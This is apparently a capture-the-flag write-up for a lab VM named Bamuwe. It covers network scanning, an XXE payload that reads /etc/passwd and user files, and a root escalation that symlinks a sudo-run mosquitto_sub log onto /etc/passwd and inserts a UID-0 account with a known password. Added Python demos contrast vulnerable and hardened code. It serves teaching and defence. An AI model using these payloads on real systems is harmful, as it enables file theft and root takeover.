Group member's box: Bamuwe

  1. Information gathering
  2. Port 80
  3. Privilege escalation

Information gathering

┌──(root㉿kali)-[~/Desktop/tmp]
└─# arp-scan -l
Interface: eth0, type: EN10MB, MAC: 00:0c:29:ff:66:80, IPv4: 192.168.31.129
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.31.1 0a:00:27:00:00:11 (Unknown: locally administered)
192.168.31.2 08:00:27:38:e9:13 PCS Systemtechnik GmbH
192.168.31.171 08:00:27:59:20:9a PCS Systemtechnik GmbH

3 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.396 seconds (106.84 hosts/sec). 3 responded
┌──(root㉿kali)-[~/Desktop/tmp]
└─# nmap 192.168.31.171
Starting Nmap 7.95 ( https://nmap.org ) at 2025-04-30 03:50 EDT
Nmap scan report for 192.168.31.171
Host is up (0.0017s latency).
Not shown: 998 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
MAC Address: 08:00:27:59:20:9A (PCS Systemtechnik/Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 6.80 seconds

Port 80

The page source contains a commented-out sample document:

<!-- XML STRUCTURE EXAMPLE -->
<!--
<user>
<name>John Doe</name>
<tel>123-4567890</tel>
<email>admin@admin.com</email>
<password>secret123</password>
</user>
-->

An obvious hint at XXE. Feed the same structure back to the parser, declaring an external entity in the DTD and referencing it from one of the fields:

<?xml version="1.0"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
<user>
<name>John Doe</name>
<tel>123-4567890</tel>
<email>&xxe;</email>
<password>secret123</password>
</user>

The file contents come back in the response. /etc/passwd reveals a user named welcome, and user.txt in that user's home directory can be read the same way by pointing the entity at it.
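As an added example (not part of the original writeup), the following Python models the server-side parser in both states: the vulnerable one, which resolves external general entities, and the fixed one, which does not. A constructed stand-in file replaces /etc/passwd so the script runs offline; the payload is the same user document as above with the entity dropped into the email field.

```python
import tempfile
import xml.sax
from io import StringIO
from pathlib import Path
from xml.sax.handler import ContentHandler, feature_external_ges

# Constructed stand-in for the target's /etc/passwd (not the box's real file),
# so the demo can run offline.
SAMPLE_PASSWD = (
    "root:x:0:0:root:/root:/bin/bash\n"
    "welcome:x:1000:1000::/home/welcome:/bin/bash\n"
)


def build_payload(file_uri: str) -> str:
    """Same document shape as the commented-out example, with the external
    entity referenced from <email> as in the writeup."""
    return (
        '<?xml version="1.0"?>\n'
        "<!DOCTYPE foo [\n"
        f'<!ENTITY xxe SYSTEM "{file_uri}">]>\n'
        "<user>\n"
        "<name>John Doe</name>\n"
        "<tel>123-4567890</tel>\n"
        "<email>&xxe;</email>\n"
        "<password>secret123</password>\n"
        "</user>\n"
    )


class UserHandler(ContentHandler):
    """Collects the text content of every child element of <user>."""

    def __init__(self):
        super().__init__()
        self.fields = {}
        self._buf = None

    def startElement(self, name, attrs):
        if name != "user":
            self._buf = []

    def characters(self, content):
        # Text from a resolved external entity arrives here too.
        if self._buf is not None:
            self._buf.append(content)

    def endElement(self, name):
        if self._buf is not None:
            self.fields[name] = "".join(self._buf)
            self._buf = None


def parse_user(xml_text: str, resolve_external: bool) -> dict:
    """resolve_external=True is the vulnerable configuration: the parser fetches
    whatever SYSTEM identifier the attacker declared. False is the fix: external
    general entities are never resolved, so &xxe; expands to nothing."""
    parser = xml.sax.make_parser()
    parser.setFeature(feature_external_ges, resolve_external)
    handler = UserHandler()
    parser.setContentHandler(handler)
    parser.parse(StringIO(xml_text))
    return handler.fields


def run_demo() -> dict:
    """Run the payload through both parser configurations against the stand-in file."""
    with tempfile.TemporaryDirectory() as tmp:
        secret = Path(tmp) / "passwd"
        secret.write_text(SAMPLE_PASSWD)
        payload = build_payload(secret.as_uri())  # file:///.../passwd
        vulnerable = parse_user(payload, resolve_external=True)
        hardened = parse_user(payload, resolve_external=False)
    return {
        "vulnerable_email": vulnerable["email"],  # leaks the file contents
        "hardened_email": hardened["email"],      # empty string
        "file_contents": SAMPLE_PASSWD,
    }


if __name__ == "__main__":
    result = run_demo()
    print("vulnerable parser returned:\n" + result["vulnerable_email"])
    print("hardened parser returned: %r" % result["hardened_email"])
```

The only difference between the two runs is the external-general-entities feature; a web backend that parses client-supplied XML should disable it (and DTD processing generally) rather than try to filter payloads.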

Privilege escalation

Reading /home/welcome/.viminfo the same way points you to pass.txt, which contains welcome's password; log in over SSH with it.

welcome@Bamuwe:~$ sudo -l
Matching Defaults entries for welcome on Bamuwe:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User welcome may run the following commands on Bamuwe:
(ALL) NOPASSWD: /opt/sub.sh
welcome@Bamuwe:~$ cat /opt/sub.sh
/usr/bin/mosquitto_sub "$@" > /home/welcome/sub.log

mosquitto is an MQTT message broker. mosquitto_sub is its subscriber client; its counterpart, the publisher, is mosquitto_pub. The script runs mosquitto_sub as root with whatever arguments we pass ("$@") and redirects its output to /home/welcome/sub.log, a path inside our own home directory. That is the bug: we control both what gets published to the topic and the file root writes it into.

Edit the mosquitto configuration file on Kali:

┌──(root㉿kali)-[~/Desktop/tmp]
└─# vim /etc/mosquitto/mosquitto.conf

Add:

listener 1883
bind_address 0.0.0.0
allow_anonymous true
password_file /etc/mosquitto/pwflie.example

Then start the broker. Two caveats: with allow_anonymous true the password_file line is unnecessary, and the path as written (pwflie.example) looks like a typo, so drop that line rather than point the broker at a file that does not exist. More importantly, note the "Using default config" line in the log below: started with no -c argument, mosquitto ignores the file just edited and, as is the default in 2.x, listens on localhost only. Either start it with -c /etc/mosquitto/mosquitto.conf so the listener above takes effect, or forward the port as described further down.

┌──(root㉿kali)-[~/Desktop/tmp]
└─# mosquitto
1746003305: mosquitto version 2.0.21 starting
1746003305: Using default config.
1746003305: Starting in local only mode. Connections will only be possible from clients running on this machine.
1746003305: Create a configuration file which defines a listener to allow remote access.
1746003305: For more details see https://mosquitto.org/documentation/authentication-methods/
1746003305: Opening ipv4 listen socket on port 1883.
1746003305: Opening ipv6 listen socket on port 1883.
1746003305: mosquitto version 2.0.21 running

If the broker is not listening on 0.0.0.0 (as in the local-only mode shown above), use socat to forward an externally reachable port to it, e.g. listening on 1884 and relaying to 127.0.0.1:1883; 1884 is the port used in the subscribe command below.

Then, in welcome's home directory, create a symlink named sub.log (the file sub.sh writes to) pointing at /etc/passwd:

welcome@Bamuwe:~$ ln -sf /etc/passwd sub.log

Copy the target's /etc/passwd to Kali and append a user entry with UID 0 (the hash below is an md5crypt $1$ hash of the password 123123, the kind openssl passwd -1 produces):

ll:$1$Zg12rJZk$P7IV1RqAT005RKjprDSo41:0:0:root:/root:/bin/bash
┌──(root㉿kali)-[~/Desktop/tmp]
└─# mosquitto_pub -t test -f passwd

welcome@Bamuwe:~$ sudo /opt/sub.sh -h 192.168.31.129 -p 1884 -t test

mosquitto_sub writes every message it receives to stdout, and sub.sh redirects that as root into sub.log, i.e. through the symlink into /etc/passwd. Order matters: a subscriber only receives messages published while it is connected, unless the message was published with -r (retained), so either start the subscriber first and publish afterwards, or add -r to mosquitto_pub. Once the message arrives, /etc/passwd has been overwritten with our copy.

welcome@Bamuwe:~$ su - ll

The password is 123123.

Privilege escalation successful.
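As an added example (not part of the original writeup), the following Python reproduces the primitive behind the whole privilege escalation in a temporary directory: a privileged writer opening a log path the low-privileged user controls. A scratch file stands in for /etc/passwd, the passwd contents are constructed, and the appended line is the writeup's own; the broker and mosquitto_sub are left out because the redirect, not MQTT, is what does the damage. A hardened open with O_NOFOLLOW is shown beside it.

```python
import errno
import os
import tempfile

# Constructed stand-in for the target's original /etc/passwd (not copied from the box).
ORIGINAL_PASSWD = (
    "root:x:0:0:root:/root:/bin/bash\n"
    "welcome:x:1000:1000::/home/welcome:/bin/bash\n"
)
# The line the writeup appends: UID 0, md5crypt hash of 123123.
APPENDED_LINE = "ll:$1$Zg12rJZk$P7IV1RqAT005RKjprDSo41:0:0:root:/root:/bin/bash\n"


def parse_passwd(text: str) -> dict:
    """name -> uid for every well-formed 7-field passwd line."""
    users = {}
    for line in text.splitlines():
        parts = line.split(":")
        if len(parts) == 7:
            users[parts[0]] = int(parts[2])
    return users


def script_style_write(log_path: str, data: str) -> None:
    """What `mosquitto_sub "$@" > /home/welcome/sub.log` does inside sub.sh:
    open(2) with O_WRONLY|O_CREAT|O_TRUNC, which follows a symlink at the
    final path component. Run as root, it truncates and rewrites the target."""
    with open(log_path, "w") as f:
        f.write(data)


def nofollow_write(log_path: str, data: str) -> None:
    """Hardened variant: O_NOFOLLOW makes the kernel refuse to open a symlink
    at the final component (ELOOP), so a planted sub.log cannot redirect the write."""
    flags = os.O_WRONLY | os.O_CREAT | os.O_TRUNC | os.O_NOFOLLOW
    fd = os.open(log_path, flags, 0o600)
    with os.fdopen(fd, "w") as f:
        f.write(data)


def run_demo() -> dict:
    """Stage the attack in a scratch directory and report what each writer did."""
    with tempfile.TemporaryDirectory() as home:
        target = os.path.join(home, "passwd")  # stands in for /etc/passwd
        with open(target, "w") as f:
            f.write(ORIGINAL_PASSWD)
        log = os.path.join(home, "sub.log")
        os.symlink(target, log)               # ln -sf /etc/passwd sub.log
        payload = ORIGINAL_PASSWD + APPENDED_LINE  # the message body we publish

        script_style_write(log, payload)      # the vulnerable redirect
        with open(target) as f:
            after_attack = parse_passwd(f.read())

        with open(target, "w") as f:          # restore, then retry hardened
            f.write(ORIGINAL_PASSWD)
        refused_with_eloop = False
        try:
            nofollow_write(log, payload)
        except OSError as e:
            refused_with_eloop = e.errno == errno.ELOOP
        with open(target) as f:
            after_hardened = parse_passwd(f.read())

    return {
        "after_attack": after_attack,         # contains ll with uid 0
        "after_hardened": after_hardened,     # unchanged
        "symlink_refused": refused_with_eloop,
    }


if __name__ == "__main__":
    result = run_demo()
    print("after attack:   ", result["after_attack"])
    print("after hardened: ", result["after_hardened"], "refused:", result["symlink_refused"])
```

O_NOFOLLOW only guards the last path component; the real fix for sub.sh is not to write into a directory the invoking user owns at all, and not to hand a root-run client an unfiltered "$@".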
